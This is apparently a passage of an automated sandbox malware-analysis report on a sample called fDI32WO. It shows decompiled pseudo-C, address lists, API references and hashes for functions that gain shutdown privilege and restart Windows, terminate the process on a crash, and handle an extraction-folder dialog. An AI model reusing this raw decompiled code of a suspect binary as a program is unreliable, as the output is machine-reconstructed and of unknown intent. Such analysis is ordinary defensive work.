                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6030109e53eb9946d8c79a6ccae10c28b520cfdba72e22bb01766027a7f823fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D14871E04A445FEF39FB788C487FA7BB1AB16344F5441AACD86C6191EA748E878F01
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                                              			E00A81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				int _t28;
                                                                                                                                                                                                                                              				signed char _t30;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t41 = __esi;
                                                                                                                                                                                                                                              				_t38 = __edi;
                                                                                                                                                                                                                                              				_t30 = __ecx;
                                                                                                                                                                                                                                              				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						if( *0xa89a40 != 0) {
                                                                                                                                                                                                                                              							_pop(_t30);
                                                                                                                                                                                                                                              							_t44 = _t46;
                                                                                                                                                                                                                                              							_t13 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                              							_push(_t38);
                                                                                                                                                                                                                                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                              								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                              								_v12 = 2;
                                                                                                                                                                                                                                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                              								CloseHandle(_v28);
                                                                                                                                                                                                                                              								_t41 = _t41;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                              										_t25 = 1;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t37 = 0x4f7;
                                                                                                                                                                                                                                              										goto L3;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t37 = 0x4f6;
                                                                                                                                                                                                                                              									goto L4;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t37 = 0x4f5;
                                                                                                                                                                                                                                              								L3:
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								L4:
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								E00A844B9(0, _t37);
                                                                                                                                                                                                                                              								_t25 = 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_pop(_t40);
                                                                                                                                                                                                                                              							return E00A86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t37 = 0x522;
                                                                                                                                                                                                                                              						_t28 = E00A844B9(0, 0x522, 0xa81140, 0, 0x40, 4);
                                                                                                                                                                                                                                              						if(_t28 != 6) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					__eax = E00A81EA7(__ecx);
                                                                                                                                                                                                                                              					if(__eax != 2) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						return _t28;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              0x00a81f90
                                                                                                                                                                                                                                              0x00a81f90
                                                                                                                                                                                                                                              0x00a81f93
                                                                                                                                                                                                                                              0x00a81f98
                                                                                                                                                                                                                                              0x00a81fa4
                                                                                                                                                                                                                                              0x00a81fa7
                                                                                                                                                                                                                                              0x00a81fc5
                                                                                                                                                                                                                                              0x00a81fcd
                                                                                                                                                                                                                                              0x00a81fdb
                                                                                                                                                                                                                                              0x00a81ee5
                                                                                                                                                                                                                                              0x00a81eea
                                                                                                                                                                                                                                              0x00a81ef1
                                                                                                                                                                                                                                              0x00a81ef4
                                                                                                                                                                                                                                              0x00a81f0c
                                                                                                                                                                                                                                              0x00a81f2e
                                                                                                                                                                                                                                              0x00a81f3a
                                                                                                                                                                                                                                              0x00a81f46
                                                                                                                                                                                                                                              0x00a81f4d
                                                                                                                                                                                                                                              0x00a81f58
                                                                                                                                                                                                                                              0x00a81f60
                                                                                                                                                                                                                                              0x00a81f61
                                                                                                                                                                                                                                              0x00a81f62
                                                                                                                                                                                                                                              0x00a81f75
                                                                                                                                                                                                                                              0x00a81f80
                                                                                                                                                                                                                                              0x00a81f77
                                                                                                                                                                                                                                              0x00a81f77
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81f77
                                                                                                                                                                                                                                              0x00a81f64
                                                                                                                                                                                                                                              0x00a81f64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81f64
                                                                                                                                                                                                                                              0x00a81f0e
                                                                                                                                                                                                                                              0x00a81f0e
                                                                                                                                                                                                                                              0x00a81f13
                                                                                                                                                                                                                                              0x00a81f13
                                                                                                                                                                                                                                              0x00a81f14
                                                                                                                                                                                                                                              0x00a81f14
                                                                                                                                                                                                                                              0x00a81f16
                                                                                                                                                                                                                                              0x00a81f17
                                                                                                                                                                                                                                              0x00a81f1a
                                                                                                                                                                                                                                              0x00a81f1f
                                                                                                                                                                                                                                              0x00a81f1f
                                                                                                                                                                                                                                              0x00a81f86
                                                                                                                                                                                                                                              0x00a81f8f
                                                                                                                                                                                                                                              0x00a81fcf
                                                                                                                                                                                                                                              0x00a81fd3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81fd3
                                                                                                                                                                                                                                              0x00a81fa9
                                                                                                                                                                                                                                              0x00a81fb4
                                                                                                                                                                                                                                              0x00a81fbb
                                                                                                                                                                                                                                              0x00a81fc3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81fc3
                                                                                                                                                                                                                                              0x00a81f9a
                                                                                                                                                                                                                                              0x00a81f9a
                                                                                                                                                                                                                                              0x00a81fa2
                                                                                                                                                                                                                                              0x00a81fd9
                                                                                                                                                                                                                                              0x00a81fda
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81fa2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A81EFB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A81F02
                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00A81FD3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                              • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                              • Opcode ID: 585e4610e3141de8974bd33a6527017dae4118203758c87f7b4fdddf0d891b9c
                                                                                                                                                                                                                                              • Instruction ID: e89e4676fc1eaea406b45017c9a4e8ab69cb172ecf2936144c389bfb117efed5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 585e4610e3141de8974bd33a6527017dae4118203758c87f7b4fdddf0d891b9c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C2186B1A402056BEB20BBE19C4AFBB7ABCEB95B50F10051AFB06D6181D7758C439761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A86CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                              				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x00a86cf7
                                                                                                                                                                                                                                              0x00a86d00
                                                                                                                                                                                                                                              0x00a86d19

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A86E26,00A81000), ref: 00A86CF7
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00A86E26,?,00A86E26,00A81000), ref: 00A86D00
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00A86E26,00A81000), ref: 00A86D0B
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00A86E26,00A81000), ref: 00A86D12
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                                                              • Opcode ID: 885a3d48af57ea05ae6dca7f568e4c201cb87542fdbbf867fe52c8ae9f92ef9e
                                                                                                                                                                                                                                              • Instruction ID: c423bdf73ee839bf389d75c14231b98e415d2b2c3e8341f85c6cb5c3cec07ef9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 885a3d48af57ea05ae6dca7f568e4c201cb87542fdbbf867fe52c8ae9f92ef9e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFD01232000108BBFB006BF1EC0CA593F28FB58712F484102F31D82020CB364453CB53
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                                                                                                              			E00A83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				int _t20;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                              				char _t24;
                                                                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                                                                              				int _t27;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				int _t38;
                                                                                                                                                                                                                                              				int _t39;
                                                                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				CHAR* _t49;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t64;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                                                              				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L38:
                                                                                                                                                                                                                                              					EndDialog(_t64, ??);
                                                                                                                                                                                                                                              					L39:
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 = 1;
                                                                                                                                                                                                                                              				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                              				if(_t10 == 0) {
                                                                                                                                                                                                                                              					E00A843D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                              					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                              					__eflags =  *0xa89a40 - _t42; // 0x3
                                                                                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                                                                                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L36:
                                                                                                                                                                                                                                              					return _t42;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t10 == _t42) {
                                                                                                                                                                                                                                              					_t20 = _a12 - 1;
                                                                                                                                                                                                                                              					__eflags = _t20;
                                                                                                                                                                                                                                              					if(_t20 == 0) {
                                                                                                                                                                                                                                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa891e4, 0x104);
                                                                                                                                                                                                                                              						__eflags = _t21;
                                                                                                                                                                                                                                              						if(_t21 == 0) {
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							_t58 = 0x4bf;
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							E00A844B9(_t64, _t58);
                                                                                                                                                                                                                                              							goto L39;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t49 = 0xa891e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t23 =  *_t49;
                                                                                                                                                                                                                                              							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                              							__eflags = _t23;
                                                                                                                                                                                                                                              						} while (_t23 != 0);
                                                                                                                                                                                                                                              						__eflags = _t49 - 0xa891e5 - 3;
                                                                                                                                                                                                                                              						if(_t49 - 0xa891e5 < 3) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 =  *0xa891e5; // 0x3a
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                              						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                                                              							_t25 = GetFileAttributesA(0xa891e4);
                                                                                                                                                                                                                                              							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                              							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              								L26:
                                                                                                                                                                                                                                              								E00A8658A(0xa891e4, 0x104, 0xa81140);
                                                                                                                                                                                                                                              								_t27 = E00A858C8(0xa891e4);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 != 0) {
                                                                                                                                                                                                                                              									__eflags =  *0xa891e4 - 0x5c;
                                                                                                                                                                                                                                              									if( *0xa891e4 != 0x5c) {
                                                                                                                                                                                                                                              										L30:
                                                                                                                                                                                                                                              										_t30 = E00A8597D(0xa891e4, 1, _t64, 1);
                                                                                                                                                                                                                                              										__eflags = _t30;
                                                                                                                                                                                                                                              										if(_t30 == 0) {
                                                                                                                                                                                                                                              											L35:
                                                                                                                                                                                                                                              											_t42 = 1;
                                                                                                                                                                                                                                              											__eflags = 1;
                                                                                                                                                                                                                                              											goto L36;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t42 = 1;
                                                                                                                                                                                                                                              										EndDialog(_t64, 1);
                                                                                                                                                                                                                                              										goto L36;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0xa891e5 - 0x5c;
                                                                                                                                                                                                                                              									if( *0xa891e5 == 0x5c) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t58 = 0x4be;
                                                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t32 = E00A844B9(_t64, 0x54a, 0xa891e4, 0, 0x20, 4);
                                                                                                                                                                                                                                              							__eflags = _t32 - 6;
                                                                                                                                                                                                                                              							if(_t32 != 6) {
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t33 = CreateDirectoryA(0xa891e4, 0);
                                                                                                                                                                                                                                              							__eflags = _t33;
                                                                                                                                                                                                                                              							if(_t33 != 0) {
                                                                                                                                                                                                                                              								goto L26;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0xa891e4);
                                                                                                                                                                                                                                              							_t58 = 0x4cb;
                                                                                                                                                                                                                                              							goto L25;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags =  *0xa891e4 - 0x5c;
                                                                                                                                                                                                                                              						if( *0xa891e4 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                              						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t34 = _t20 - 1;
                                                                                                                                                                                                                                              					__eflags = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						EndDialog(_t64, 0);
                                                                                                                                                                                                                                              						 *0xa89124 = 0x800704c7;
                                                                                                                                                                                                                                              						goto L39;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                              					if(_t34 != 0x834) {
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t37 = LoadStringA( *0xa89a3c, 0x3e8, 0xa88598, 0x200);
                                                                                                                                                                                                                                              					__eflags = _t37;
                                                                                                                                                                                                                                              					if(_t37 != 0) {
                                                                                                                                                                                                                                              						_t38 = E00A84224(_t64, _t46, _t46);
                                                                                                                                                                                                                                              						__eflags = _t38;
                                                                                                                                                                                                                                              						if(_t38 == 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa887a0);
                                                                                                                                                                                                                                              						__eflags = _t39;
                                                                                                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t63 = 0x4c0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						E00A844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L38;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = 0x4b1;
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}

























                                                                                                                                                                                                                                              0x00a8321b
                                                                                                                                                                                                                                              0x00a8321e
                                                                                                                                                                                                                                              0x00a83221
                                                                                                                                                                                                                                              0x00a8343c
                                                                                                                                                                                                                                              0x00a8343e
                                                                                                                                                                                                                                              0x00a8343f
                                                                                                                                                                                                                                              0x00a83445
                                                                                                                                                                                                                                              0x00a83447
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83447
                                                                                                                                                                                                                                              0x00a83229
                                                                                                                                                                                                                                              0x00a8322a
                                                                                                                                                                                                                                              0x00a8322f
                                                                                                                                                                                                                                              0x00a833ec
                                                                                                                                                                                                                                              0x00a833f7
                                                                                                                                                                                                                                              0x00a83410
                                                                                                                                                                                                                                              0x00a83416
                                                                                                                                                                                                                                              0x00a8341d
                                                                                                                                                                                                                                              0x00a8342d
                                                                                                                                                                                                                                              0x00a8342d
                                                                                                                                                                                                                                              0x00a83438
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83438
                                                                                                                                                                                                                                              0x00a83237
                                                                                                                                                                                                                                              0x00a83243
                                                                                                                                                                                                                                              0x00a83243
                                                                                                                                                                                                                                              0x00a83246
                                                                                                                                                                                                                                              0x00a832ee
                                                                                                                                                                                                                                              0x00a832f4
                                                                                                                                                                                                                                              0x00a832f6
                                                                                                                                                                                                                                              0x00a833d4
                                                                                                                                                                                                                                              0x00a833d6
                                                                                                                                                                                                                                              0x00a833db
                                                                                                                                                                                                                                              0x00a833dc
                                                                                                                                                                                                                                              0x00a833de
                                                                                                                                                                                                                                              0x00a833df
                                                                                                                                                                                                                                              0x00a83370
                                                                                                                                                                                                                                              0x00a83372
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83372
                                                                                                                                                                                                                                              0x00a832fc
                                                                                                                                                                                                                                              0x00a83301
                                                                                                                                                                                                                                              0x00a83301
                                                                                                                                                                                                                                              0x00a83303
                                                                                                                                                                                                                                              0x00a83304
                                                                                                                                                                                                                                              0x00a83304
                                                                                                                                                                                                                                              0x00a8330a
                                                                                                                                                                                                                                              0x00a8330d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83313
                                                                                                                                                                                                                                              0x00a83318
                                                                                                                                                                                                                                              0x00a8331a
                                                                                                                                                                                                                                              0x00a83331
                                                                                                                                                                                                                                              0x00a83332
                                                                                                                                                                                                                                              0x00a8333a
                                                                                                                                                                                                                                              0x00a8333d
                                                                                                                                                                                                                                              0x00a8337c
                                                                                                                                                                                                                                              0x00a83388
                                                                                                                                                                                                                                              0x00a8338f
                                                                                                                                                                                                                                              0x00a83394
                                                                                                                                                                                                                                              0x00a83396
                                                                                                                                                                                                                                              0x00a833a4
                                                                                                                                                                                                                                              0x00a833ab
                                                                                                                                                                                                                                              0x00a833b6
                                                                                                                                                                                                                                              0x00a833be
                                                                                                                                                                                                                                              0x00a833c3
                                                                                                                                                                                                                                              0x00a833c5
                                                                                                                                                                                                                                              0x00a83435
                                                                                                                                                                                                                                              0x00a83437
                                                                                                                                                                                                                                              0x00a83437
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83437
                                                                                                                                                                                                                                              0x00a833c7
                                                                                                                                                                                                                                              0x00a833c9
                                                                                                                                                                                                                                              0x00a833cc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a833cc
                                                                                                                                                                                                                                              0x00a833ad
                                                                                                                                                                                                                                              0x00a833b4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a833b4
                                                                                                                                                                                                                                              0x00a83398
                                                                                                                                                                                                                                              0x00a83399
                                                                                                                                                                                                                                              0x00a8339b
                                                                                                                                                                                                                                              0x00a8339c
                                                                                                                                                                                                                                              0x00a8339d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8339d
                                                                                                                                                                                                                                              0x00a8334c
                                                                                                                                                                                                                                              0x00a83351
                                                                                                                                                                                                                                              0x00a83354
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8335c
                                                                                                                                                                                                                                              0x00a83362
                                                                                                                                                                                                                                              0x00a83364
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83366
                                                                                                                                                                                                                                              0x00a83367
                                                                                                                                                                                                                                              0x00a83369
                                                                                                                                                                                                                                              0x00a8336a
                                                                                                                                                                                                                                              0x00a8336b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8336b
                                                                                                                                                                                                                                              0x00a8331c
                                                                                                                                                                                                                                              0x00a83323
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83329
                                                                                                                                                                                                                                              0x00a8332b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8332b
                                                                                                                                                                                                                                              0x00a8324c
                                                                                                                                                                                                                                              0x00a8324c
                                                                                                                                                                                                                                              0x00a8324f
                                                                                                                                                                                                                                              0x00a832c8
                                                                                                                                                                                                                                              0x00a832ce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a832ce
                                                                                                                                                                                                                                              0x00a83251
                                                                                                                                                                                                                                              0x00a83256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83271
                                                                                                                                                                                                                                              0x00a83277
                                                                                                                                                                                                                                              0x00a83279
                                                                                                                                                                                                                                              0x00a83298
                                                                                                                                                                                                                                              0x00a8329d
                                                                                                                                                                                                                                              0x00a8329f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a832b0
                                                                                                                                                                                                                                              0x00a832b6
                                                                                                                                                                                                                                              0x00a832b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a832be
                                                                                                                                                                                                                                              0x00a83280
                                                                                                                                                                                                                                              0x00a83289
                                                                                                                                                                                                                                              0x00a8328e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8328e
                                                                                                                                                                                                                                              0x00a8327b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8327b
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000003E8,00A88598,00000200), ref: 00A83271
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A833E2
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A833F7
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A83410
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000836), ref: 00A83426
                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000), ref: 00A8342D
